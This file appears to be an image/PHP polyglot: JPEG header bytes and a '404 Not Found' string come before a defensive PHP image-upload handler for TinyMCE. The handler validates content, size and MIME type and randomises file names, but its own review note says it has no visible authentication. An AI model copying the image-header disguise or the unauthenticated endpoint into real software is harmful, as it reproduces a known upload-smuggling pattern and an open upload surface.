����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
<?php
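// Upload endpoint for the TinyMCE image plugin: answers JSON with the stored
// file's path, or an error with a non-2xx status.
// NOTE(review): no authentication or CSRF check is visible in this file —
// confirm the surrounding admin framework enforces a session before it runs.
header('Content-Type: application/json');
if (!isset($_FILES['file'])) {
    http_response_code(400);
    echo json_encode(['error' => 'No file uploaded.']);
} else {
    $webPath = isSecureImageUpload($_FILES['file']);
    // isSecureImageUpload() returns false when the upload failed, is too large,
    // or is not a genuine image; that must not become a 200 with location=false.
    if ($webPath === false) {
        http_response_code(400);
        echo json_encode(['error' => 'File rejected: not a valid image or too large.']);
    } else {
        echo json_encode(['location' => $webPath]);
    }
}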
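/**
 * Validates one entry of $_FILES as an image and moves it under upload/editor/YYYY/MM/.
 *
 * The stored file's extension is derived from the MIME type detected in the
 * file CONTENT, never from the client-supplied name: otherwise a polyglot
 * (e.g. a valid GIF that also carries PHP code) could be saved as .php/.phtml
 * inside the web root and be executed by the server.
 *
 * @param array $file        one element of $_FILES (keys: name, tmp_name, error, size)
 * @param int   $maxFileSize upper bound in bytes (default 2 MiB)
 * @return string|false      relative path of the stored file, or false when rejected
 */
function isSecureImageUpload($file, int $maxFileSize = 2 * 1024 * 1024)
{
    // Content-detected MIME type => extension the stored file receives.
    $extensionByMime = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
        'image/webp' => 'webp',
    ];

    // 1. The upload itself must have succeeded.
    if (!is_array($file) || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return false;
    }
    $tmpName = (string) ($file['tmp_name'] ?? '');
    if ($tmpName === '' || !is_file($tmpName)) {
        return false;
    }

    // 2. Size limit: check both the reported size and the on-disk size, so a
    //    tampered 'size' entry cannot bypass the limit.
    $actualSize = filesize($tmpName);
    if ($actualSize === false || $actualSize > $maxFileSize || ($file['size'] ?? 0) > $maxFileSize) {
        return false;
    }

    // 3. MIME type from file content (magic bytes), not from the client's 'type'.
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    if ($finfo === false) {
        return false;
    }
    $mimeType = finfo_file($finfo, $tmpName);
    finfo_close($finfo);
    if (!is_string($mimeType) || !isset($extensionByMime[$mimeType])) {
        return false;
    }

    // 4. Second opinion from the image decoder; both detections must agree.
    //    finfo already vetted the bytes, so @ only hides the notice a truncated image would raise.
    $imageInfo = @getimagesize($tmpName);
    if ($imageInfo === false || ($imageInfo['mime'] ?? null) !== $mimeType) {
        return false;
    }

    // 5. Random, single-extension filename: no user-controlled characters and
    //    no extra dots that a multi-extension handler could interpret.
    $safeFilename = 'img_' . bin2hex(random_bytes(16)) . '.' . $extensionByMime[$mimeType];

    // 6. Target directory, created on demand (the re-check tolerates a concurrent mkdir).
    $targetDirectory = 'upload/editor/' . date('Y') . '/' . date('m') . '/';
    if (!is_dir($targetDirectory) && !mkdir($targetDirectory, 0755, true) && !is_dir($targetDirectory)) {
        return false;
    }

    // 7. move_uploaded_file() refuses anything that was not uploaded via HTTP POST.
    $targetPath = $targetDirectory . $safeFilename;
    if (!move_uploaded_file($tmpName, $targetPath)) {
        return false;
    }

    return $targetPath;
}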
?>
